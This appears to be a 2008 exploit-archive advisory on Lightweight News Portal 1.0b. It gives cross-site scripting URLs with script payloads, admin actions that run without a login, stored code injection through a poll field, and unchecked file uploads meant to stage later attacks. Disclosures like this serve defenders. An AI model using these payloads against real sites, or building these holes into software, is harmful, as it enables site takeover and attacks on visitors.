Lightweight News Portal [LNP] 1.0b Multiple Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Lightweight News Portal [LNP] 1.0b Multiple Remote Vulnerabilities
# Published : 2008-06-20
# Author : sToRm
# Previous Title : FubarForum 1.5 (index.php page) Local File Inclusion Vulnerability
# Next Title : IPTBB 0.5.6 (index.php act) Local File Inclusion Vulnerability

____       _   _       _ ___   __                        _  __
 / ___| ___ |  | |_   _| |   / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
| |  _ / _ |  | | | | | | | V / _ | | | | '__/ __|/ _  | |_ / _ | '__/ _` |
| |_| | (_) | |  | |_| | | | | | (_) | |_| | |  __   __/ |  _| (_) | | | (_| |
 ____|___/|_| _|__,_|_|_| |_|___/ __,_|_|  |___/___|_|_|(_)___/|_|  __, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm


LNP: Lightweight news Portal v1.0-BETA
Multiple Remote Vulnerabilities


Cross-Site Scripting
--------------------

show_photo.php?photo="><script>javascript:alert(document.domain)</script>
show_potd.php?potd="><script>javascript:alert(document.domain)</script>


Insecure Administration
-----------------------

The admin page faces us with a login, but many important functions are allowed 
to be executed without a logged-in session.

admin.php?A=potd_delete
admin.php?A=potd
admin.php?A=vote_update
admin.php?A=vote
admin.php?A=modifynews


Permanent Code Injection
------------------------

admin.php?A=vote

"Current question" field allows for code injection, allowing us to force 
all users browsing the poll to view an XSS or browser exploit. 


File Upload
-----------

admin.php?A=potd

The "picture of the day" manager allows for further images to be 
uploaded, but does not check for image validity. Although a phpshell 
cannot be executed through this method, a source may be uploaded for 
inclusion in further attacks, possibly an LFI somewhere on the server. 

# www.Syue.com [2008-06-20]